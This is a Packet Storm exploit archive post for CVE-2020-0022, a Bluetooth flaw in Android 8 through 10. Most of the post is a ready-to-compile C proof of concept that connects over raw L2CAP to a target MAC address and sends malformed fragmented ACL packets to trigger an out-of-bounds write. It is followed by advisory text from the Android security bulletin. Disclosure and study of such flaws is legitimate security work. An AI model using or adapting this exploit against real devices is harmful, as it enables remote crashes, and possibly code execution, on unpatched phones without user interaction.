exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android Bluetooth Remote Denial Of Service

Android Bluetooth Remote Denial Of Service
Posted Mar 25, 2020
Authored by nu11secur1ty

Android suffers from a bluetooth remote denial of service vulnerability.

tags | exploit, remote, denial of service
advisories | CVE-2020-0022
SHA-256 | 89e5543cb6f51f283e41a489aaa3e084de84be0c84b8090c5910f061d0b501ba

Android Bluetooth Remote Denial Of Service

Change Mirror Download
# Exploit Title: Critical Bluetooth Vulnerability in Android (CVE-2020-0022) - Remote DoS
# Author: nu11secur1ty
# Date: 2020-03-24
# Vendor: Android
# Link:
https://github.com/nu11secur1ty/Andr01dExploits/tree/master/CVE-2020-0022
# CVE: CVE-2020-0022



[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty


[Exploit Program Code]

/*
* gcc -lbluetooth poc.c -o poc
* sudo ./p0c_blue MAC_ADDR
*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/uio.h>


int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,
uint16_t data_length,uint16_t, uint16_t);

int main(int argc,char **argv) {
bdaddr_t dst_addr;
if (argc != 2){
printf("usage: ./p0c_blue MAC_ADDR\n");
exit(1);
}
str2ba(argv[1], &dst_addr);
struct hci_dev_info di;

// Get HCI Socket
printf("\nCreating HCI socket...\n");
int hci_device_id = hci_get_route(NULL);
int hci_socket = hci_open_dev(hci_device_id);
if(hci_devinfo(hci_device_id,&di)< 0){
perror("devinfo");
exit(1);
}
uint16_t hci_handle;
// -------- L2CAP Socket --------
// local addr
struct l2cap_conninfo l2_conninfo;
int l2_sock;
struct sockaddr_l2 laddr, raddr;
laddr.l2_family = AF_BLUETOOTH;
laddr.l2_bdaddr = di.bdaddr;
laddr.l2_psm = htobs(0x1001);
laddr.l2_cid = htobs(0x0040);

// remote addr
memset(&raddr, 0, sizeof(raddr));
raddr.l2_family = AF_BLUETOOTH;
raddr.l2_bdaddr = dst_addr;

// create socket
printf("\nCreating l2cap socket...\n");
if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0){
perror("create l2cap socket");
exit(1);
}
// bind and connect
bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr));
if(connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr))<0){
perror("connect");
exit(1);
}
socklen_t l2_conninfolen = sizeof(l2_conninfo);
getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &l2_conninfo,
&l2_conninfolen);
hci_handle = l2_conninfo.hci_handle;
printf("fuck%d", hci_handle);

// -------- L2CAP Socket --------

// HCI Connect
printf("\nCreating a HCI BLE connection...\n");
printf("\nPrepare to send packet\n");
uint16_t datalen = 33;
uint16_t _bs_l2cap_len = htobs(datalen);
uint16_t _bs_cid = htobs(0x0001);
uint8_t packet[4 + datalen + 0x1000];
memcpy(&packet[0],&_bs_l2cap_len,2);
memcpy(&packet[2],&_bs_cid,2);
memset(&packet[4], 0x99, datalen+0x1000);
int fl = 36;
int i =0 ;
hci_send_acl_data(hci_socket, hci_handle, &packet[i] , fl,0x2, fl );
i+=fl;
printf("\nSent fisrt packet\n");
hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 300,0x1, 300);

printf("\nClosing HCI socket...\n");
close(hci_socket);
printf("\nClosing l2cap socket...\n");
close(l2_sock);
return 0;
}

int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,
uint16_t data_length, uint16_t PBflag, uint16_t dlen){
uint8_t type = HCI_ACLDATA_PKT;
uint16_t BCflag = 0x0000; // Broadcast flag
//uint16_t PBflag = 0x0002; // Packet Boundary flag
uint16_t flags = ((BCflag << 2) | PBflag) & 0x000F;
hci_acl_hdr hd;
hd.handle = htobs(acl_handle_pack(hci_handle, flags));
//hd.dlen = (data_length);
hd.dlen = dlen;
struct iovec iv[3];
int ivn = 3;

iv[0].iov_base = &type; // Type of operation
iv[0].iov_len = 1; // Size of ACL operation flag
iv[1].iov_base = &hd; // Handle info + flags
iv[1].iov_len = HCI_ACL_HDR_SIZE; // L2CAP header length + data
length
iv[2].iov_base = data; // L2CAP header + data
iv[2].iov_len = (data_length); // L2CAP header length + data
length

while (writev(hci_socket, iv, ivn) < 0) {
if (errno == EAGAIN || errno == EINTR)
continue;
perror("writev");
return -1;
}
return 0;
}


[Video]
https://www.youtube.com/watch?v=9C0bz-GiVUI


[Vulnerability Type]
Remote DoS


[CVE Reference]
In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out
of bounds write due to an incorrect bounds calculation.
This could lead to remote code execution over Bluetooth with no additional
execution privileges needed.
User interaction is not needed for exploitation.Product: AndroidVersions:
Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715


[Security Issue]
The Android Security Bulletin contains details of security vulnerabilities
affecting Android devices. Security patch levels of 2020-02-05 or later
address all of these issues. To learn how to check a device's security
patch level, see Check and update your Android version.
Android partners are notified of all issues at least a month before
publication. Source code patches for these issues have been released to the
Android Open Source Project (AOSP) repository and linked from this
bulletin. This bulletin also includes links to patches outside of AOSP.
The most severe of these issues is a critical security vulnerability in the
System component that could enable a remote attacker using a specially
crafted transmission to execute arbitrary code within the context of a
privileged process. The severity assessment is based on the effect that
exploiting the vulnerability would possibly have on an affected device,
assuming the platform and service mitigations are turned off for
development purposes or if successfully bypassed.
Refer to the Android and Google Play Protect mitigations section for
details on the Android security platform protections and Google Play
Protect, which improve the security of the Android platform.



[Disclosure Timeline]
Published February 3, 2020 | Updated February 5, 2020


[+] Disclaimer
Disclaimer: The entry creation date may reflect when the CVE ID was
allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered,
shared with the affected vendor, publicly disclosed, or updated in CVE.

FIX:

-
-
- Fix on OS 10


CVE References Type Severity Updated
AOSP versions
-------------------------------------------------------------------------------------------------
CVE-2020-0022 A-143894715 DoS Moderate 10


-
-
- Table:

https://source.android.com/security/bulletin/2020-02-01


@nu11secur1ty
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close